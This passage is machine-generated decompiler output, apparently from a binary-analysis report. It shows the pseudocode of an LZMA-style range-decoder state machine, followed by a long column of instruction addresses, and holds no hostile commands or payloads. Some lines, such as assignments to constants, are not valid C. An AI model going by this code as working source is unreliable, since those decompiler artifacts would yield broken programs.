											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                              0x00000000
                                                              0x00406c2e
                                                              0x00406c2e
                                                              0x00406c32
                                                              0x00406c5b
                                                              0x00406c65
                                                              0x00406c34
                                                              0x00406c3d
                                                              0x00406c4a
                                                              0x00406c4d
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406fa6
                                                              0x00406fc0
                                                              0x00406fc3
                                                              0x00406fc9
                                                              0x00406fd4
                                                              0x00406fd6
                                                              0x00406fa8
                                                              0x00406fa8
                                                              0x00406fb7
                                                              0x00406fbb
                                                              0x00406fbb
                                                              0x00406fe0
                                                              0x00000000
                                                              0x00000000
                                                              0x00406fe2
                                                              0x00406fe6
                                                              0x00407195
                                                              0x004071ab
                                                              0x004071b3
                                                              0x004071ba
                                                              0x004071bc
                                                              0x004071c3
                                                              0x004071c7
                                                              0x004071c7
                                                              0x00406ff2
                                                              0x00406ff9
                                                              0x00407001
                                                              0x00407004
                                                              0x00407007
                                                              0x00407007
                                                              0x0040700d
                                                              0x0040700d
                                                              0x004067a9
                                                              0x004067a9
                                                              0x004067a9
                                                              0x004067b2
                                                              0x00000000
                                                              0x00000000
                                                              0x004067b8
                                                              0x00000000
                                                              0x004067c3
                                                              0x00000000
                                                              0x00000000
                                                              0x004067cc
                                                              0x004067cf
                                                              0x004067d2
                                                              0x004067d6
                                                              0x00000000
                                                              0x00000000
                                                              0x004067dc
                                                              0x004067df
                                                              0x004067e1
                                                              0x004067e2
                                                              0x004067e5
                                                              0x004067e7
                                                              0x004067e8
                                                              0x004067ea
                                                              0x004067ed
                                                              0x004067f2
                                                              0x004067f7
                                                              0x00406800
                                                              0x00406813
                                                              0x00406816
                                                              0x00406822
                                                              0x0040684a
                                                              0x0040684c
                                                              0x0040685a
                                                              0x0040685a
                                                              0x0040685e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040684e
                                                              0x0040684e
                                                              0x00406851
                                                              0x00406852
                                                              0x00406852
                                                              0x00000000
                                                              0x0040684e
                                                              0x00406828
                                                              0x0040682d
                                                              0x0040682d
                                                              0x00406836
                                                              0x0040683e
                                                              0x00406841
                                                              0x00000000
                                                              0x00406847
                                                              0x00406847
                                                              0x00000000
                                                              0x00406847
                                                              0x00000000
                                                              0x00406864
                                                              0x00406864
                                                              0x00406868
                                                              0x00407114
                                                              0x00000000
                                                              0x00407114
                                                              0x00406871
                                                              0x00406881
                                                              0x00406884
                                                              0x00406887
                                                              0x00406887
                                                              0x00406887
                                                              0x0040688a
                                                              0x0040688e
                                                              0x00000000
                                                              0x00000000
                                                              0x00406890
                                                              0x00406896
                                                              0x004068c0
                                                              0x004068c6
                                                              0x004068cd
                                                              0x00000000
                                                              0x004068cd
                                                              0x0040689c
                                                              0x0040689f
                                                              0x004068a4
                                                              0x004068a4
                                                              0x004068af
                                                              0x004068b7
                                                              0x004068ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004068ff
                                                              0x00406905
                                                              0x00406908
                                                              0x00406915
                                                              0x0040691d
                                                              0x00406f91
                                                              0x00000000
                                                              0x00000000
                                                              0x004068d4
                                                              0x004068d4
                                                              0x004068d8
                                                              0x00407123
                                                              0x00000000
                                                              0x00407123
                                                              0x004068e4
                                                              0x004068ef
                                                              0x004068ef
                                                              0x004068ef
                                                              0x004068f2
                                                              0x004068f5
                                                              0x004068f8
                                                              0x004068fd
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406fa6
                                                              0x00406fc0
                                                              0x00406fc3
                                                              0x00406fc9
                                                              0x00406fd4
                                                              0x00406fd6
                                                              0x00406fa8
                                                              0x00406fa8
                                                              0x00406fb7
                                                              0x00406fbb
                                                              0x00406fbb
                                                              0x00406fe0
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406925
                                                              0x00406927
                                                              0x0040692a
                                                              0x0040699b
                                                              0x0040699e
                                                              0x004069a1
                                                              0x004069a8
                                                              0x004069b2
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406f91
                                                              0x00406f91
                                                              0x0040692c
                                                              0x00406930
                                                              0x00406933
                                                              0x00406935
                                                              0x00406938
                                                              0x0040693b
                                                              0x0040693d
                                                              0x00406940
                                                              0x00406942
                                                              0x00406947
                                                              0x0040694a
                                                              0x0040694d
                                                              0x00406951
                                                              0x00406958
                                                              0x0040695b
                                                              0x00406962
                                                              0x00406966
                                                              0x0040696e
                                                              0x0040696e
                                                              0x0040696e
                                                              0x00406968
                                                              0x00406968
                                                              0x00406968
                                                              0x0040695d
                                                              0x0040695d
                                                              0x0040695d
                                                              0x00406972
                                                              0x00406975
                                                              0x00406993
                                                              0x00406995
                                                              0x00000000
                                                              0x00406977
                                                              0x00406977
                                                              0x0040697a
                                                              0x0040697d
                                                              0x00406980
                                                              0x00406982
                                                              0x00406982
                                                              0x00406982
                                                              0x00406985
                                                              0x00406988
                                                              0x0040698a
                                                              0x0040698b
                                                              0x0040698e
                                                              0x00000000
                                                              0x0040698e
                                                              0x00000000
                                                              0x00406bc4
                                                              0x00406bc8
                                                              0x00406be6
                                                              0x00406be9
                                                              0x00406bf0
                                                              0x00406bf3
                                                              0x00406bf6
                                                              0x00406bf9
                                                              0x00406bfc
                                                              0x00406bff
                                                              0x00406c01
                                                              0x00406c08
                                                              0x00406c09
                                                              0x00406c0b
                                                              0x00406c0e
                                                              0x00406c11
                                                              0x00406c14
                                                              0x00406c14
                                                              0x00406c19
                                                              0x00000000
                                                              0x00406c19
                                                              0x00406bca
                                                              0x00406bcd
                                                              0x00406bd0
                                                              0x00406bda
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406f91
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c71
                                                              0x00406c75
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c7b
                                                              0x00406c7f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c85
                                                              0x00406c87
                                                              0x00406c8b
                                                              0x00406c8b
                                                              0x00406c8e
                                                              0x00406c92
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ce2
                                                              0x00406ce6
                                                              0x00406ced
                                                              0x00406cf0
                                                              0x00406cf3
                                                              0x00406cfd
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00406ce8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d09
                                                              0x00406d0d
                                                              0x00406d14
                                                              0x00406d17
                                                              0x00406d1a
                                                              0x00406d0f
                                                              0x00406d0f
                                                              0x00406d0f
                                                              0x00406d1d
                                                              0x00406d20
                                                              0x00406d23
                                                              0x00406d23
                                                              0x00406d26
                                                              0x00406d29
                                                              0x00406d2c
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d36
                                                              0x00406d3b
                                                              0x00000000
                                                              0x00000000
                                                              0x00406dc9
                                                              0x00406dc9
                                                              0x00406dcd
                                                              0x0040716b
                                                              0x00000000
                                                              0x0040716b
                                                              0x00406dd3
                                                              0x00406dd6
                                                              0x00406dd9
                                                              0x00406ddd
                                                              0x00406de0
                                                              0x00406de6
                                                              0x00406de8
                                                              0x00406de8
                                                              0x00406de8
                                                              0x00406deb
                                                              0x00406dee
                                                              0x00000000
                                                              0x00000000
                                                              0x004069be
                                                              0x004069be
                                                              0x004069c2
                                                              0x0040712f
                                                              0x00000000
                                                              0x0040712f
                                                              0x004069c8
                                                              0x004069cb
                                                              0x004069ce
                                                              0x004069d2
                                                              0x004069d5
                                                              0x004069db
                                                              0x004069dd
                                                              0x004069dd
                                                              0x004069dd
                                                              0x004069e0
                                                              0x004069e3
                                                              0x004069e3
                                                              0x004069e6
                                                              0x004069e9
                                                              0x00000000
                                                              0x00000000
                                                              0x004069ef
                                                              0x004069f5
                                                              0x00000000
                                                              0x00000000
                                                              0x004069fb
                                                              0x004069fb
                                                              0x004069ff
                                                              0x00406a02
                                                              0x00406a05
                                                              0x00406a08
                                                              0x00406a0b
                                                              0x00406a0c
                                                              0x00406a0f
                                                              0x00406a11
                                                              0x00406a17
                                                              0x00406a1a
                                                              0x00406a1d
                                                              0x00406a20
                                                              0x00406a23
                                                              0x00406a26
                                                              0x00406a29
                                                              0x00406a45
                                                              0x00406a48
                                                              0x00406a4b
                                                              0x00406a4e
                                                              0x00406a55
                                                              0x00406a59
                                                              0x00406a5b
                                                              0x00406a5f
                                                              0x00406a2b
                                                              0x00406a2b
                                                              0x00406a2f
                                                              0x00406a37
                                                              0x00406a3c
                                                              0x00406a3e
                                                              0x00406a40
                                                              0x00406a40
                                                              0x00406a62
                                                              0x00406a69
                                                              0x00406a6c
                                                              0x00000000
                                                              0x00406a72
                                                              0x00000000
                                                              0x00406a72
                                                              0x00000000
                                                              0x00406a77
                                                              0x00406a77
                                                              0x00406a7b
                                                              0x0040713b
                                                              0x00000000
                                                              0x0040713b
                                                              0x00406a81
                                                              0x00406a84
                                                              0x00406a87
                                                              0x00406a8b
                                                              0x00406a8e
                                                              0x00406a94
                                                              0x00406a96
                                                              0x00406a96
                                                              0x00406a96
                                                              0x00406a99
                                                              0x00406a9c
                                                              0x00406a9c
                                                              0x00406a9c
                                                              0x00406aa2
                                                              0x00000000
                                                              0x00000000
                                                              0x00406aa4
                                                              0x00406aa7
                                                              0x00406aaa
                                                              0x00406aad
                                                              0x00406ab0
                                                              0x00406ab3
                                                              0x00406ab6
                                                              0x00406ab9
                                                              0x00406abc
                                                              0x00406abf
                                                              0x00406ac2
                                                              0x00406ada
                                                              0x00406add
                                                              0x00406ae0
                                                              0x00406ae3
                                                              0x00406ae3
                                                              0x00406ae6
                                                              0x00406aea
                                                              0x00406aec
                                                              0x00406ac4
                                                              0x00406ac4
                                                              0x00406acc
                                                              0x00406ad1
                                                              0x00406ad3
                                                              0x00406ad5
                                                              0x00406ad5
                                                              0x00406aef
                                                              0x00406af6
                                                              0x00406af9
                                                              0x00000000
                                                              0x00406afb
                                                              0x00000000
                                                              0x00406afb
                                                              0x00406af9
